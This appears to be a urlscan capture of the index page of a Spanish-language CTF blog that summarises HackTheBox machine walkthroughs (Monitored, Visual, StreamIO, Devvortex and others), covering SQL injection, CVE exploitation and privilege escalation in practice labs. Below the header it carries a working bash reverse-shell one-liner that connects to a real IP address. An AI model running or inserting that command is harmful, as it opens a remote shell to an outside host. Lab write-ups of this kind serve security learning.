sckull.github.io Open in urlscan Pro
2606:50c0:8003::153  Public Scan

Submitted URL: http://sckull.github.io/
Effective URL: https://sckull.github.io/
Submission: On May 23 via api from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

  

> SCKULL

----

dark light htb


 * CTF
 * TryHackMe
 * HackTheBox
 * CyberSecLabs
 * Archive
 * Tags
 * Notes
 * About

dark light htb
CTF
TryHackMe HackTheBox CyberSecLabs
Archive Tags Notes About
sckull - blog

bash -i >& /dev/tcp/146.70.117.86/1337 0>&1

📌 HACKTHEBOX - MONITORED

📅 MAY 11, 2024 · ✍️ SCKULL

nagios-xi snmp snmpwalk php nagios-api nagios-command nagios-plugin sqlmap
CVE-2023-40931 sqlinjection
En Monitored descubrimos credenciales por el servicio SNMP los cuales nos
permitieron generar un token y posteriormente acceso dashboard de Nagios XI con
privilegios bajos, tras explotar una vulnerabilidad SQL Injection accedimos como
administrador a la API lo que nos permitio crear un usuario como administrador
con el cual logramos ejecutar comandos y plugins para obtener una shell.
Finalmente escalamos privilegios utilizando un script de Nagios que realiza el
backup de distintos archivos.


--------------------------------------------------------------------------------

📌 HACK THE BOX - VISUAL

📅 FEB 24, 2024 · ✍️ SCKULL

visual-studio git-http-server C# prebuildevent postbuildevent nishang xampp php
SeImpersonatePrivilege SharpEfsPotato
Visual compila un proyecto de Visual Studio segun el repositorio dado,
utilizamos custom build events dentro de un proyecto para ejecutar una shell.
Dentro, ejecutamos una shell en Xampp lo que nos dio acceso como Local Service,
obtuvimos de vuelta el privilegio SeImpersonate para luego acceder como System
por medio de SharpEfsPotato.


--------------------------------------------------------------------------------

📌 HACK THE BOX - CLICKER

📅 JAN 27, 2024 · ✍️ SCKULL

nfs showmount prepared-statements php ghidra perl virtualenv web-privesc
code-execution sqli
En Clicker encontramos un backup del sitio en un recurso compartido, en este
identificamos una vulnerabilidad de SQLi lo que nos permitio Escalar Privilegios
en el sitio, asi mismo logramos la Ejecucion de Codigo PHP y a su vez Comandos
lo que nos dio acceso a la maquina. Encontramos un fichero que, tras analizarlo
nos permitio la lectura de archivos y el acceso a un segundo usuario. Finalmente
escalamos privilegios tras modificar las variables de entorno de un script en
Perl.


--------------------------------------------------------------------------------

📌 HACK THE BOX - STREAMIO

📅 SEP 17, 2022 · ✍️ SCKULL

sqli time-based SQL Server python responder bloodhound bloodhound.py powershell
powerview invoke-command new-PSSession ffuf kerbrute hydra mssqlclient chisel
firefox LAPS out-of-band lfi rfi code injection
En StreamIO descubrimos y explotamos una vulnerabilidad SQLi la cual nos
permitió acceder a un panel de administración, en este ultimo encontramos una
vulnerabilidad LFI, en consecuencia RFI y Code Injection lo que nos dió acceso a
un primer usuario. Tras enumerar las bases de datos obtuvimos credenciales para
un segundo usuario. Credenciales en un perfil de Firefox nos permitió ingresar
con un tercer usuario. Finalmente con los permisos de este último realizamos la
lectura de la contraseña en LAPS para acceder como administrador.


--------------------------------------------------------------------------------

HACKTHEBOX - DEVVORTEX

📅 APR 27, 2024 · ✍️ SCKULL

ffuf joomla CVE-2023-23752 mysql john apport-cli CVE-2023-1326 coredump
En Devvortex inicialmente realizamos la explotacion de una vulnerabilidad en
Joomla que nos dio acceso como Administrador y posteriormente la posibilidad de
ejecucion de una shell inversa tras modificar el template. Dentro, enumeramos la
base de datos donde descubrimos credenciales para un segundo usuario. Finalmente
escalamos privilegios tras ejecutar una shell en el 'pager' de apport.


--------------------------------------------------------------------------------

HACKTHEBOX - SURVEILLANCE

📅 APR 20, 2024 · ✍️ SCKULL

craftCMS CVE-2023-41892 backup-sql zoneminder CVE-2023-26035 metasploit
command-injection perl
En Surveillance explotamos una vulnerabilidad en CraftCMS para acceder a la
maquina, dentro, encontramos credenciales en un backup de base de datos logrando
cambiar a un segundo usuario. Descubrimos ZoneMinder localmente y ademas una
vulnerabilidad la cual explotamos lo que nos dio acceso a un tercer usuario.
Finalmente escalamos privilegios tras analizar un script en perl donde
explotamos una vulnerabilidad de Command Injection.


--------------------------------------------------------------------------------

HACKTHEBOX - CODIFY

📅 APR 6, 2024 · ✍️ SCKULL

nodejs sandbox-vm2 CVE-2023-32314 sqlite3 john pspy
En Codify realizamos "bypass" a un sandbox vm2 lo que nos dio acceso a un primer
usuario. Dentro, descubrimos una base de datos sqlite en la que obtuvimos el
hash a un segundo usuario. Finalmente escalamos privilegios tras monitorear la
ejecucion de un script que realizaba una conexion con MySQL.


--------------------------------------------------------------------------------

HACKTHEBOX - ANALYTICS

📅 MAR 23, 2024 · ✍️ SCKULL

metabase CVE-2023-38646 gameoverlay CVE-2021-3493
En Analytics encontramos que exise una vulnerabilidad en Metabase que permite la
ejecucion de comandos lo que nos permitio el acceso a un primer usuario.
Logramos el acceso por SSH con las credenciales en las variables de entorno.
Finalmente escalamos privilegios con GameOveraly.


--------------------------------------------------------------------------------

   
 * 1
   
 * 2
   
 * 3
   
 * 4
   
 * 5
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
 * …
   
 * 30

 * 

--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

Dany Sucuc
RedTeamer & Pentester wannabe

sckull

Guatemala

https://sckull.github.io


--------------------------------------------------------------------------------

Posts
 * HackTheBox - Monitored
 * HackTheBox - Devvortex
 * HackTheBox - Surveillance
 * HackTheBox - Codify
 * HackTheBox - Analytics
 * HackTheBox - Manager

--------------------------------------------------------------------------------

Categorias android 3 bsidesgt 5 challenge 11 chromeOS 1 CTF 7 cyberseclabs 1
freebsd 1 hackthebox 140 linux 184 notes 1 otro 2 owasp 2 tryhackme 94 windows
41

--------------------------------------------------------------------------------

Español English



--------------------------------------------------------------------------------



©2024, All Rights Reserved

SGVsbG8gV29ybGQh